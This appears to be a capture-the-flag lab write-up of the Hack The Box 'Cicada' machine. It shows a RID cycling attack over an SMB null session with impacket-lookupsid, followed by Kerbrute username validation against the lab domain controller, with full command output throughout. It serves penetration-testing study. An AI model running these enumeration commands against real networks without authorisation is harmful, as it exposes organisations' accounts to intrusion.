InfoSec LAB

Cicada_RID_Cycling

Created: 2 min read

RID Cycling

Both the SMB and MSRPC servers allows null session. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-lookupsid CICADA.HTB/blahblah@cicada-dc.cicada.htb 100000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password:
[*] Brute forcing SIDs at cicada-dc.cicada.htb
[*] StringBinding ncacn_np:cicada-dc.cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah Found the following domain users;

  • john.smoulder
  • sarah.dantelia
  • michael.wrightson
  • david.orelious
  • emily.oscars

Those usernames have been saved to the users.txt file

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ kerbrute userenum --dc cicada-dc.cicada.htb -d CICADA.HTB ./users.txt -t 200                            
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop
 
2024/09/28 22:24:16 >  Using KDC(s):
2024/09/28 22:24:16 >  	cicada-dc.cicada.htb:88
 
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 john.smoulder@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 emily.oscars@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 sarah.dantelia@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 david.orelious@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 michael.wrightson@CICADA.HTB
2024/09/28 22:24:16 >  Done! Tested 5 usernames (5 valid) in 0.027 seconds

5 usernames have been validated against the target KDC

Interactive Graph View

Backlinks